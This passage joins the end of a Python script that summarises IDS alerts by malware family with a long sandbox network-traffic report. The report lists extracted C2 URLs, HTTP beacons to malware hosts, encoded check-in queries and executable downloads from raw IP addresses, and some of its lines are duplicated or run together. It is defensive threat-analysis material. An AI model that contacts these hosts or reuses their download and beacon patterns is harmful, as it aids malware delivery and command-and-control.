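    return f"{m.group(1)}.{m.group(2)}" if m else None


def summarize(alerts):
    """Group by family: rule SIDs, C2 endpoints (resolver excluded), domains, hit count."""
    out = defaultdict(lambda: {"sids": set(), "endpoints": set(), "domains": set(), "hits": 0})
    for a in alerts:
        s = out[a["family"]]
        s["sids"].add(a["sid"])
        s["hits"] += 1
        if a["dport"] != RESOLVER_PORT:
            s["endpoints"].add(f'{a["dst"]}:{a["dport"]}')
        dom = refang_domain(a["msg"])
        if dom:
            s["domains"].add(dom)
    return dict(out)


if __name__ == "__main__":
    for fam, s in sorted(summarize(parse_alerts(SAMPLE)).items()):
        print(f"{fam}: {s['hits']} hits, SIDs {sorted(s['sids'])}, "
              f"endpoints {sorted(s['endpoints'])}, domains {sorted(s['domains'])}")
```

Run against the full block above, the Socks5Systemz group collapses to a single endpoint with well over a hundred hits, which is the beaconing behaviour to alert on, while the Lumma group yields domains only: its TLS connections terminate at Cloudflare addresses that should not be blocked as IOCs.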
                  Source: C:\Windows\explorer.exe | Domain query: my.account.sony.com
                  Source: C:\Windows\explorer.exe | Domain query: winoui.com
                  Source: Malware configuration extractor | URLs: http://goodfooggooftool.net/index.php
                  Source: Malware configuration extractor | URLs: http://sulugilioiu19.net/index.php
                  Source: Malware configuration extractor | URLs: http://selebration17io.io/index.php
                  Source: Malware configuration extractor | URLs: http://vacantion18ffeu.cc/index.php
                  Source: Malware configuration extractor | URLs: http://valarioulinity1.net/index.php
                  Source: Malware configuration extractor | URLs: http://buriatiarutuhuob.net/index.php
                  Source: Malware configuration extractor | URLs: http://cassiosssionunu.me/index.php
                  Source: unknown | Network traffic detected: DNS query count 333
                  Source: unknown | Network traffic detected: IP country count 19
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
                      Date: Thu, 08 Feb 2024 18:08:01 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 8336105
                      Connection: keep-alive
                      Content-Description: File Transfer
                      Content-Disposition: attachment; filename=may.exe
                      Content-Transfer-Encoding: binary
                      Expires: 0
                      Cache-Control: must-revalidate
                      Pragma: public
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N2teumzEy89MKUeeoEigfopykvJj28IGlNnuWbetT7AxM0qMG%2FDXfxRPS0Fjf1az1WWh4txLH4DAssgD%2BhCjaSSQEs35Q4XH6dgJhP9ge4Jk7SnAt72g%2FUPQS0th%2BbHI4bjX"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8525d0c528a91399-ATL
                      alt-svc: h3=":443"; ma=86400
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Thu, 08 Feb 2024 18:08:04 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 9104384
                      Last-Modified: Fri, 02 Feb 2024 16:13:27 GMT
                      Connection: keep-alive
                      ETag: "65bd14a7-8aec00"
                      Accept-Ranges: bytes
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
                      Server: nginx/1.24.0
                      Date: Thu, 08 Feb 2024 18:08:15 GMT
                      Content-Type: application/octet-stream
                      Connection: close
                      Content-Description: File Transfer
                      Content-Disposition: attachment; filename=fde12b9d.exe
                      Content-Transfer-Encoding: binary
                      Expires: 0
                      Cache-Control: must-revalidate
                      Pragma: public
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
                      Date: Thu, 08 Feb 2024 18:08:18 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Last-Modified: Thu, 08 Feb 2024 18:00:02 GMT
                      ETag: "34e00-610e2949adafe"
                      Accept-Ranges: bytes
                      Content-Length: 216576
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: application/x-msdos-program
                  Source: Joe Sandbox View | IP Address: 104.21.83.220
                  Source: Joe Sandbox View | IP Address: 185.172.128.90
                  Source: Joe Sandbox View | IP Address: 172.67.152.52
                  Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                  Source: Joe Sandbox View | ASN Name: NADYMSS-ASRU
                  Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox View | JA3 fingerprint: 83d60721ecc423892660e275acc4dffd
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: resergvearyinitiani.shop
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: gemcreedarticulateod.shop
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: secretionsuitcasenioise.shop
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: claimconcessionrebe.shop
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: liabilityarrangemenyit.shop
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Cookie: __cf_mw_byp=q42V.iCLZDxozAKhor79mYjzd4QGiDbwc6y4TRQBlOY-1707415685-0-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 61 | Host: liabilityarrangemenyit.shop
                  Source: global traffic | HTTP traffic detected: GET /photo/1.jpg HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: mmtplonline.com
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ivbdiovdcenm.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 221 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ykrwrduhfmmj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 124 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jrggvvlhykthhy.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 338 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://raymlvvpfmcuv.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 304 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rxxjbpcdcalcssk.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 223 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dvddobopxwm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 310 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bvrdgfotlfjc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 123 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gljsqebbdpd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 203 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xwsxpfjigelqbhrc.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 145 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://npdlrnubgkper.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 239 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sexwxqiycroxlqwv.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 133 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: GET /data/pdf/may.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: asx.sunaviat.com
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rjlqjrgjprlmdax.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 302 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tshcxmnjrlb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 210 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.172.128.19
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kfutvohtcxvepjj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 240 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ghwgelorldpx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 303 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: GET /check/index.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: trmpc.com
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fhnjkllhaswiigah.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 369 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wwxsmdgujubvfp.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 300 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gfcimligryjufef.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 295 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yroegqatdtttghd.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 224 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ogpsecrwfrlduj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 306 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ourwudejcmhgl.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 283 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://getpjvwfmjgvbg.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 158 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hklcuoodhgdv.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 247 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fciyarokqcip.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 328 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xgejeccuawdtuycg.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 200 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://leibbmcewtsue.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 125 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dilbkqnnskeag.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 215 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: GET /emd/1.jpg HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: emgvod.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lpeigckkdwhoeqac.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 243 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://roylmspbgpg.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 112 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pydvrmssydbcxi.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 163 | Host: sjyey.com
                  Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929f3a HTTP/1.1 | Host: ebttdox.ua | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: GET /uploads/logo3.jpg HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: emgvod.com
                  Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1 | Host: ebttdox.ua | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hxcqsmajrjcjhy.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 246 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ehlobtvspoepvms.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 213 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://alvpnaelbmplftuo.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 339 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rjmtwjbdgwicx.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 228 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://otsebqbdkojs.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 124 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xbliqiuuludlcdbk.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 204 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kelrpfcitxhkepdr.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 351 | Host: selebration17io.io
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mxbkjmplrowwv.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 331 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1 | Host: ebttdox.ua | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://evcpavcuegdnch.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 145 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1 | Host: ebttdox.ua | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uundwvxwrbibcbk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 350 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1 | Host: ebttdox.ua | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jirncwexqges.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 242 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1 | Host: ebttdox.ua | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yldqwtgoqyfssepl.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 326 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1 | Host: ebttdox.ua | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cdcspcgeqyf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 211 | Host: selebration17io.io
                  Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1 | Host: ebttdox.ua | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknown | TCP traffic detected without corresponding DNS query: 91.213.233.138
                  Source: unknown | TCP traffic detected without corresponding DNS query: 45.125.65.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 8.209.79.125
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.26.207.181
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: global trafficHTTP traffic detected: GET /photo/1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mmtplonline.com
                  Source: global trafficHTTP traffic detected: GET /data/pdf/may.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: asx.sunaviat.com
                  Source: global trafficHTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.172.128.19
                  Source: global trafficHTTP traffic detected: GET /check/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: trmpc.com
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=four&s=ab HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.127Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /ping.php?substr=four HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 5.42.64.33Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /emd/1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: emgvod.com
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929f3a HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /uploads/logo3.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: emgvod.com
